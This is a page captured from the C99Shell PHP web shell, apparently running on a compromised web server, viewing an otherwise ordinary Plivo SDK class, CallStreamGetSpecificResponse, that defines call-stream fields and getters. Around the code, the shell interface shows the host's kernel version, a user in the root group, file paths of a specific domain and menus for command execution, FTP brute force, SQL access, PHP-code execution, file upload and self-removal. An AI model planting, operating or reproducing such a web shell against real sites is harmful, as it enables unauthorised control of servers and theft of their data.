!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/plivo/plivo-php/src/Plivo/Resources/Call/   drwxr-xr-x
Free 29.11 GB of 117.98 GB (24.68%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     CallStreamGetSpecificResponse.php (3.83 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Plivo\Resources\Call;


use 
Plivo\Resources\ResponseUpdate;

/**
 * Class CallStream
 * @package Plivo\Resources\Call
 */
class CallStreamGetSpecificResponse extends ResponseUpdate
{
    protected 
$audioTrack;
    protected 
$bidirectional;
    protected 
$billedAmount;
    protected 
$billDuration;
    protected 
$callUuid;
    protected 
$createdAt;
    protected 
$endTime;
    protected 
$plivoAuthId;
    protected 
$resourceUri;
    protected 
$roundedBillDuration;
    protected 
$serviceUrl;
    protected 
$startTime;
    protected 
$status;
    protected 
$statusCallbackUrl;
    protected 
$streamId;

    
/**
     * CallStreamGetSpecificResponse constructor.
     * @param $apiID
     * @param $audioTrack
     * @param $bidirectional
     * @param $billedAmount
     * @param $billDuration
     * @param $callUuid
     * @param $createdAt
     * @param $endTime
     * @param $plivoAuthId
     * @param $resourceUri
     * @param $roundedBillDuration
     * @param $serviceUrl
     * @param $startTime
     * @param $status
     * @param $statusCallbackUrl
     * @param $statusCode
     * @param $streamId
     */
    
public function __construct($apiID$audioTrack$bidirectional$billedAmount$billDuration$callUuid$createdAt$endTime$plivoAuthId$resourceUri$roundedBillDuration$serviceUrl$startTime$status$statusCallbackUrl$streamId$statusCode)
    {
        
parent::__construct($apiID'',$statusCode);

        
$this->audioTrack $audioTrack;
        
$this->bidirectional $bidirectional;
        
$this->billedAmount $billedAmount;
        
$this->billDuration $billDuration;
        
$this->callUuid $callUuid;
        
$this->createdAt $createdAt;
        
$this->endTime $endTime;
        
$this->plivoAuthId $plivoAuthId;
        
$this->resourceUri $resourceUri;
        
$this->roundedBillDuration $roundedBillDuration;
        
$this->serviceUrl $serviceUrl;
        
$this->startTime $startTime;
        
$this->status $status;
        
$this->statusCallbackUrl $statusCallbackUrl;
        
$this->streamId $streamId;
    }

    
/**
     * @return mixed
     */
    
public function getCallUuid()
    {
        return 
$this->callUuid;
    }

    
/**
     * @return mixed
     */
    
public function getAudioTrack()
    {
        return 
$this->audioTrack;
    }

    
/**
     * @return mixed
     */
    
public function getBidirectional()
    {
        return 
$this->bidirectional;
    }

    
/**
     * @return mixed
     */
    
public function getBilledAmount()
    {
        return 
$this->billedAmount;
    }

    
/**
     * @return mixed
     */
    
public function getBillDuration()
    {
        return 
$this->billDuration;
    }


    
/**
     * @return mixed
     */
    
public function getRoundedBillDuration()
    {
        return 
$this->roundedBillDuration;
    }

    
/**
     * @return mixed
     */
    
public function getCreatedAt()
    {
        return 
$this->createdAt;
    }

    
/**
     * @return mixed
     */
    
public function getPlivoAuthId()
    {
        return 
$this->plivoAuthId;
    }

    
/**
     * @return mixed
     */
    
public function getResourceUri()
    {
        return 
$this->resourceUri;
    }

    
/**
     * @return mixed
     */
    
public function getEndTime()
    {
        return 
$this->endTime;
    }

    
/**
     * @return mixed
     */
    
public function getServiceUrl()
    {
        return 
$this->serviceUrl;
    }

    
/**
     * @return mixed
     */
    
public function getStartTime()
    {
        return 
$this->startTime;
    }

    
/**
     * @return mixed
     */
    
public function getStatus()
    {
        return 
$this->status;
    }

    
/**
     * @return mixed
     */
    
public function getStatusCallbackUrl()
    {
        return 
$this->statusCallbackUrl;
    }

    
/**
     * @return mixed
     */
    
public function getStreamId()
    {
        return 
$this->streamId;
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0033 ]--